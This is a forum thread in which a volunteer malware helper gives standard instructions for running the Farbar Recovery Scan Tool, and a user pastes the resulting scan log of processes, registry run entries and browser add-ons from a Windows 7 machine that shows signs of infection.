Weird popup on startup


  • This topic is locked
24 replies to this topic

#1 sirjoe1

sirjoe1

  • Members
  • 21 posts
  • OFFLINE
  • Local time:07:08 AM

Posted 09 August 2017 - 11:38 PM

As above, when I start Windows and log in, I get this message: "The module c:/windows/system32/config/system...../pdevhelper.dll" failed to load. It's regsvr32.
Can anyone identify this issue, please?
I did Google searches and got almost no results. Only something about Java Oracle. Thanks in advance.




 


#2 pystryker

pystryker

  • Malware Response Team
  • 730 posts
  • OFFLINE
  • Gender:Male
  • Local time:06:08 PM

Posted 10 August 2017 - 06:20 AM

Hello and welcome to Bleeping Computer! My nickname is Pystryker :) , and I will be helping you with your issue today.


Before we get started, I have a few things I need to go over with you:
  • If you are receiving help for this issue at another forum, please let me know so I can close this thread.
  • Please download to and run all requested tools from your Desktop.
  • Please do not install any new software during the cleaning process other than the tools I provide for you. This can hinder the cleaning process.
  • At the top of your post, please click on the "Follow this topic" button and make sure that the "Received notification" box is checked and set to "Instantly". This will send an email to you as soon as I reply to your topic, allowing us to solve your problem faster.
  • If any of your security programs give you a warning about any tool I ask you to use, please do not worry. All the links and tools I provide to you will be safe.
  • Please do not run any tools other than the ones I ask you to, when I ask you to. Some of these tools can be very dangerous if used improperly. Also, if you use a tool that I have not requested you use, it can cause false positives, thereby delaying the complete cleaning of your machine.
  • This is a complicated process. It requires several steps, patience, and careful following of my instructions in the order they are given to diagnose your problems to get your machine back in working order.
  • Please stay with me until the end of all steps and procedures and I declare your system clean. Just because there is a lack of symptoms does not indicate a clean machine. I promise to do the same for you.
  • It is impossible for me to know what interactions may happen between your computer's software and the tools we will use to clean your machine. Therefore, I highly recommend you back up any critical personal files on your machine before we start.
  • If you have any questions at all, please don't hesitate to ask. There's no such thing as a stupid question when dealing with malware.
  • If you are unsure of an instruction I give you, or if something unexpected occurs, do NOT proceed! Stop and ask for clarification of the instruction or tell me what occurred.
  • Please remember, the fixes are for your machine and your machine ONLY! Do not use these fixes on any other machine, each fix is tailor made for your system only. Using a fix on another machine can and will cause serious damage.
  • Once we have cleaned your machine, we'll have some cleanup and prevention steps to go through. We will also provide you with some information about how to reduce your chances of infection and get some protections in place to help defend you against this in the future.
  • Please be patient while I am analyzing your logs. I know you are probably scared and very frustrated with this problem, but I am a volunteer and sometimes life does get in the way. :)
Special Note: Please know that I am against piracy in any form. This includes, but is not limited to, movies, music, and software. This is also a violation of the Terms of Service you agreed to when you created your account here. If programs such as KMS that are used to activate illegal copies of Microsoft software are found, you will be asked to remove them and submit fresh logs.

Failure to do so will result in assistance being withdrawn.

Now, let's get started, shall we? :thumbsup:

Let's get a look at your system and see what's going on. :)


Scan with Farbar's Recovery Scan Tool (FRST)


Please download Farbar Recovery Scan Tool and save it to your Desktop. All tools must be run from the Desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system, download both of them and try to run them. Only one of them will run on your system; that will be the right version.
  • Right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
  • Place a check in the box marked Addition.txt
  • Press the Scan button.
  • It will produce a log called FRST.txt in the same directory the tool is run from.
  • Please copy and paste the log back here.
  • The first time the tool is run it generates another log (Addition.txt - also located in the same directory as FRST.exe/FRST64.exe). Please also paste that along with the FRST.txt into your reply.
Things I need to see in your next post:

Please post each of these logs as a separate reply in this thread.

FRST Log

Addition.txt Log

I close my topics if there is no response after 3 days. Please PM a moderator or myself to reopen your topic.

Please PM me only if I'm helping you with your computer issues and I have not responded in 2 days. Please remember, I'm a volunteer and sometimes life does get in the way. :)

Please stay with me until I declare your machine clean. Absence of symptoms does not ensure your machine is clean.

If you'd like to make a donation via Paypal, please click here.





#3 sirjoe1

sirjoe1
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  • Local time:07:08 AM

Posted 10 August 2017 - 07:54 AM

Hello, below is the log.

 

FRST log: Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 09-08-2017

Ran by w7 (administrator) on DRAGON-EMPEROR (10-08-2017 20:42:22)
Running from C:\Users\w7\Downloads
Loaded Profiles: w7 (Available Profiles: w7)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: Chinese (Simplified, PRC)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(BlueStack Systems, Inc.) C:\Program Files (x86)\Bluestacks\HD-LogRotatorService.exe
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Hi-Rez Studios) C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(乐视网信息技术(北京)股份有限公司) C:\Program Files (x86)\Letv\LeService.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe
(Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\BleServicesCtrl.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\LCore.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(Micro-Star International Co., Ltd.) C:\Windows\SysWOW64\MSIService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\nvwirelesscontroller.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Qualcomm Atheros) C:\Program Files\Qualcomm Atheros\Network Manager\KillerService.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(SoftEther VPN Project at University of Tsukuba, Japan.) C:\Program Files\SoftEther VPN Server\vpnserver_x64.exe
(BlueStack Systems, Inc.) C:\Program Files (x86)\Bluestacks\HD-Agent.exe
(乐视网信息技术(北京)股份有限公司) C:\Program Files (x86)\Letv\LeTVLoader.exe
(乐视网信息技术(北京)股份有限公司) C:\Users\w7\AppData\Roaming\Letv\AfterPlay\AfterPlayMonitor.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
() C:\Program Files (x86)\TunnelBear\TBear.Maintenance.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Micro-Star International Co., Ltd.) C:\Program Files (x86)\MSI\KLM\KLM.exe
() C:\Program Files (x86)\Android_USB_Driver_Z\Bin\MonServiceUDisk.exe
(中国银联股份有限公司) C:\Windows\SysWOW64\UPEditNew\UPService.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(中国银联股份有限公司) C:\Windows\SysWOW64\UPEditNew\UPSecurityInput.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(乐视网信息技术(北京)股份有限公司) C:\Program Files (x86)\Letv\LmpDownloader.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
(Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
(Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\mediasrv.exe
(Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Youku.com) C:\Users\w7\AppData\Roaming\ytmediacenter\ikuacc.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Strong Technology, LLC) C:\Program Files (x86)\StrongVPN\StrongDial.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(VideoLAN) C:\Program Files\VideoLAN\VLC\vlc.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Duodian Technology Co. Ltd.) C:\Users\w7\AppData\Roaming\Nox\bin\Nox.exe
(BigNox Corporation) C:\Program Files\Bignox\BigNoxVM\RT\NoxVMSVC.exe
() C:\Program Files\Bignox\BigNoxVM\RT\NoxVMHandle.exe
() C:\Users\w7\AppData\Roaming\Nox\bin\nox_adb.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Registry (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13667032 2014-01-22] (Realtek Semiconductor)
HKLM\...\Run: [egui] => C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe [5581888 2014-02-24] (ESET)
HKLM\...\Run: [BLEServicesCtrl] => C:\Program Files (x86)\Intel\Bluetooth\BleServicesCtrl.exe [184632 2013-11-13] (Motorola Solutions, Inc.)
HKLM\...\Run: [BTMTrayAgent] => rundll32.exe "C:\Program Files (x86)\Intel\Bluetooth\btmshellex.dll",TrayApp
HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [16293496 2016-09-30] (Logitech Inc.)
HKLM\...\Run: [ShadowPlay] => "C:\Windows\system32\rundll32.exe" C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [3146704 2017-05-09] (Malwarebytes)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2013-08-15] (Intel Corporation)
HKLM-x32\...\Run: [KLM] => C:\Program Files (x86)\MSI\KLM\KLM.exe [1567624 2013-05-31] (Micro-Star International Co., Ltd.)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [91520 2010-03-13] (Microsoft Corporation)
HKLM-x32\...\Run: [URPmedia] => C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\config\systemprofile\AppData\Local\Ofics\pdevhelper.dll
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2017-07-21] (Oracle Corporation)
Winlogon\Notify\igfxcui: C:\Windows\SYSTEM32\igfxdev.dll (Intel Corporation)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [6482200 2014-09-26] (Piriform Ltd)
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\Run: [StrongVPN Client] => C:\Program Files (x86)\StrongVPN\StrongDial.exe [1679768 2017-08-07] (Strong Technology, LLC)
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\Run: [ctfmon] => C:\Windows\system32\ctfmon.exe [9728 2009-07-14] (Microsoft Corporation)
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\Run: [BlueStacks Agent] => C:\Program Files (x86)\Bluestacks\HD-Agent.exe [970264 2016-06-14] (BlueStack Systems, Inc.)
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\Run: [Loader] => C:\Program Files (x86)\Letv\LeTVLoader.exe [2261936 2017-02-16] (乐视网信息技术(北京)股份有限公司)
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\Run: [AfterPlayMonitor] => C:\Users\w7\AppData\Roaming\Letv\AfterPlay\AfterPlayMonitor.ex
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\Run: [Microsoft Update] => C:\Users\w7\AppData\Local\Microsoft Windows\svchost.exe <==== ATTENTION
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {0764306c-c594-11e4-846a-a0a8cdde279a} - I:\Setup.exe
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {1a98ae99-e609-11e5-8358-a0a8cdde279e} - J:\Setup.exe
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {2b0eb1c4-2e1a-11e7-b884-a0a8cdde279e} - L:\Setup.exe /s
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {2b0eb1f1-2e1a-11e7-b884-a0a8cdde279e} - L:\Setup.exe
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {2b0eb201-2e1a-11e7-b884-a0a8cdde279e} - I:\Setup.exe
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {2b0eb205-2e1a-11e7-b884-a0a8cdde279e} - I:\Setup.exe
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {3e4ebb45-ea13-11e6-b566-a0a8cdde279e} - C:\Windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL I:\autorun.exe /auto
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {3e4ebb61-ea13-11e6-b566-a0a8cdde279e} - C:\Windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL L:\autorun.exe /auto
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {3e4ebb74-ea13-11e6-b566-a0a8cdde279e} - C:\Windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL L:\autorun.exe /auto
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {4db061a9-503f-11e7-b4a9-a0a8cdde279e} - L:\OPPODriver.exe
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {50fe49dc-23eb-11e5-9f9c-a0a8cdde279e} - J:\Setup.exe /s
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {72c8e6e0-d712-11e5-8a92-a0a8cdde279e} - J:\Setup.exe /s
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {798c261b-5bb1-11e7-a7c7-a0a8cdde279e} - C:\Windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL I:\autorun.exe /auto
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {798c2667-5bb1-11e7-a7c7-a0a8cdde279e} - C:\Windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL I:\autorun.exe /auto
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {7d9b032c-7627-11e4-b95e-a0a8cdde279a} - H:\Setup.exe /s
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {8654e362-34c1-11e4-af85-a0a8cdde279e} - I:\Setup.exe
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {8a4d8128-9d80-11e4-9452-a0a8cdde279e} - I:\Setup.exe /s
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {8c0fd517-9cf0-11e5-b7e2-a0a8cdde279e} - I:\OPPODriver.exe
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {95a8c3ae-0c24-11e6-b041-a0a8cdde279e} - C:\Windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL J:\autorun.exe /auto
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {95a8c3af-0c24-11e6-b041-a0a8cdde279e} - C:\Windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL K:\autorun.exe /auto
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {c369952c-baa7-11e6-9fa5-a0a8cdde279e} - M:\OPPODriver.exe
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {d68e90f2-9efd-11e4-82cf-a0a8cdde279e} - H:\Setup.exe
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {e18949df-86cc-11e6-8f36-a0a8cdde279e} - C:\Windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL K:\autorun.exe /auto
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {e18949ed-86cc-11e6-8f36-a0a8cdde279e} - C:\Windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL I:\autorun.exe /auto
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MountPoints2: {fea0655e-0ea3-11e7-9986-a0a8cdde279e} - I:\OPPODriver.exe
HKU\S-1-5-18\...\RunOnce: [zZHILNIspz] => C:\Windows\system32\config\SYSTEM~1\AppData\Local\BJIHIW~1\wssvc.exe
HKU\S-1-5-18\...\RunOnce: [AxGfMIQkjR] => C:\Windows\system32\config\SYSTEM~1\AppData\Local\DSHCAJ~1\winsvc.exe
AppInit_DLLs: C:\Windows\system32\nvinitx.dll => C:\Windows\system32\nvinitx.dll [170688 2016-12-12] (NVIDIA Corporation)
AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [148016 2016-12-12] (NVIDIA Corporation)
GroupPolicy: Restriction - Chrome <==== ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 221.7.128.68 221.7.136.68
Tcpip\..\Interfaces\{168F3B28-679A-46FB-83CB-2404F670B8AB}: [DhcpNameServer] 221.7.128.68 221.7.136.68
Tcpip\..\Interfaces\{19AAC75B-C9BB-40F5-B8E4-7268E604A409}: [NameServer] 8.8.8.8,8.8.8.4
Tcpip\..\Interfaces\{19AAC75B-C9BB-40F5-B8E4-7268E604A409}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{4866F1B2-4599-4CC6-ACEC-9C54CB433C6D}: [NameServer] 199.21.151.42 199.21.151.25
Tcpip\..\Interfaces\{4C452996-EFBA-4FFA-8B3F-CE5C40B3228F}: [NameServer] 216.169.129.2 216.169.130.2
Tcpip\..\Interfaces\{588E39E7-0D93-4F7B-8963-12BC0DB30CA2}: [DhcpNameServer] 192.168.1.5 202.103.224.68
Tcpip\..\Interfaces\{CF52435F-F85E-4754-9F57-4925D2553590}: [NameServer] 193.138.228.127 91.148.254.5
 
Internet Explorer:
==================
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-1997723473-3802709511-3419621205-1000 -> DefaultScope {828B376B-F2F6-4778-928C-E29EC877535E} URL = hxxp://www.google.com/cse?cx=partner-pub-0900663996874144:6813731868&ie=UTF-8&q={searchTerms}&sa=Search&ref=#gsc.tab=0&gsc.q={searchTerms}&gsc.page=1
SearchScopes: HKU\S-1-5-21-1997723473-3802709511-3419621205-1000 -> {828B376B-F2F6-4778-928C-E29EC877535E} URL = hxxp://www.google.com/cse?cx=partner-pub-0900663996874144:6813731868&ie=UTF-8&q={searchTerms}&sa=Search&ref=#gsc.tab=0&gsc.q={searchTerms}&gsc.page=1
BHO: YoukuEyeOnIE64 Class -> {509DC5B8-F673-4102-B86E-5BF20BF4EE54} -> C:\Users\w7\AppData\Roaming\ytmediacenter\X64\ykcool64.dll [2015-12-25] (Youku.com)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\ssv.dll [2017-08-07] (Oracle Corporation)
BHO-x32: YoukuEyeOnIE Class -> {7DC4B5B6-C122-44C4-825C-B310513A47CB} -> C:\Users\w7\AppData\Roaming\ytmediacenter\ykcool.dll [2015-12-25] (Youku.com)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation)
BHO-x32: SpeedBit Link Verification Helper -> {D5974A72-C81C-4DC3-BE77-A8A7BBC8864E} -> C:\Program Files (x86)\DAP\LinkVerifier.dll => No File
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\jp2ssv.dll [2017-08-07] (Oracle Corporation)
 
FireFox:
========
FF DefaultProfile: gpvajf5u.default
FF DefaultProfile: feefnn2u.default-1439732963054-1502179100800
FF ProfilePath: C:\Users\w7\AppData\Roaming\Mozilla\icecat\Profiles\gpvajf5u.default [2017-08-02]
FF Extension: (IceCatHome) - C:\Program Files\icecat\browser\extensions\abouticecat@gnu.org [2017-08-01] [not signed]
FF Extension: (HTTPS-Everywhere) - C:\Program Files\icecat\browser\extensions\https-everywhere-eff@eff.org [2017-08-01]
FF ProfilePath: C:\Users\w7\AppData\Roaming\Mozilla\Firefox\Profiles\feefnn2u.default-1439732963054-1502179100800 [2017-08-10]
FF HKLM-x32\...\Firefox\Extensions: [daplinkchecker@speedbit.com] - C:\Program Files (x86)\DAP\daplinkchecker => not found
FF HKLM-x32\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird
FF Extension: (ESET Smart Security Extension) - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird [2014-09-06] [not signed]
FF HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\Firefox\Extensions: [{F17C1572-C9EC-4e5c-A542-D05CBB5C5A08}] - C:\Program Files (x86)\DAP\DAPFireFox => not found
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_26_0_0_151.dll [2017-08-09] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [No File]
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_26_0_0_151.dll [2017-08-09] ()
FF Plugin-x32: @baidu.com/YunWebDetectPlugin -> C:\Users\w7\AppData\Roaming\baidu\BaiduNetdisk\npYunWebDetect.dll [2017-05-18] (Baidu.com, Inc.)
FF Plugin-x32: @cfca.com/SecEditCtl.BOC,version=1.0.0.9 -> C:\Windows\system32\npSecEditCtl.BOC.x86.dll [No File]
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-12-09] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-12-09] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.144.2 -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\dtplugin\npDeployJava1.dll [2017-08-07] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.144.2 -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\plugin2\npjp2.dll [2017-08-07] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @nexon.net/NxGame -> C:\ProgramData\NexonUS\NGM\npNxGameUS.dll [2015-08-09] (Nexon)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2016-12-12] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2016-12-12] (NVIDIA Corporation)
FF Plugin-x32: @tiancity.com/NxGame -> \NGM\npNxGameCN.dll [No File]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [No File]
FF Plugin HKU\S-1-5-21-1997723473-3802709511-3419621205-1000: @my.com/Games -> C:\Users\w7\AppData\Local\MyComGames\NPMyComDetector.dll [2017-05-15] (MY.COM B.V.)
FF Plugin HKU\S-1-5-21-1997723473-3802709511-3419621205-1000: none.com/Base -> C:\Program Files (x86)\Letv\npBase.dll [2017-02-16] (letv)
FF Plugin HKU\S-1-5-21-1997723473-3802709511-3419621205-1000: youku.com/YoukuAgent -> C:\Users\w7\AppData\Roaming\ytmediacenter\npYoukuAgent.dll [2016-08-24] (Youku)
FF Plugin HKU\S-1-5-21-1997723473-3802709511-3419621205-1000: youku.com/YoukuAgent_x86_64 -> C:\Users\w7\AppData\Roaming\ytmediacenter\X64\npYoukuAgent_x64.dll [2016-08-24] (Youku)
 
Chrome: 
=======
CHR DefaultProfile: Default
CHR HomePage: Default -> hxxps://www.yahoo.com/
CHR StartupUrls: Default -> "hxxps://www.yahoo.com/"
CHR DefaultSearchURL: Default -> hxxps://search.yahoo.com/search?p={searchTerms}&fr=opensearch
CHR DefaultSearchKeyword: Default -> yahoo.com
CHR Profile: C:\Users\w7\AppData\Local\Google\Chrome\User Data\Default [2017-08-10]
CHR Extension: (Google Slides) - C:\Users\w7\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-04-25]
CHR Extension: (Google Docs) - C:\Users\w7\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-08-21]
